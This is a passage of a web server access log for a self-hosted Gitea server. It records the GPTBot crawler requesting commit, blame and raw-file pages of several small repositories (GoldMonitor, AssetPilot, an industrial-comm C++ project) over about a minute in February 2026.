Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 12398] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 12358] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10390] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" -[17/Feb/2026:14:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 11794] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:14:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:14:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:14:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" -[17/Feb/2026:14:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" -[17/Feb/2026:14:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 11489] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 11577] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10464] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10857] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:14:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17345] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:14:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2ffetcher.py.good" [Client 74.7.227.38] [Length 23688] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" -[17/Feb/2026:14:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/yearly" [Client 74.7.227.38] [Length 8592] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:14:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10076] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15222] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 27401] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10856] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" -[17/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10458] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:14:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19462] [Gzip 6.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10870] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" -[17/Feb/2026:14:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" -[17/Feb/2026:14:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17359] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14350] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" -[17/Feb/2026:14:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 22985] [Gzip 10.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" -[17/Feb/2026:14:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11110] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14113] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11269] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14155] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11140] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11296] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21302] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 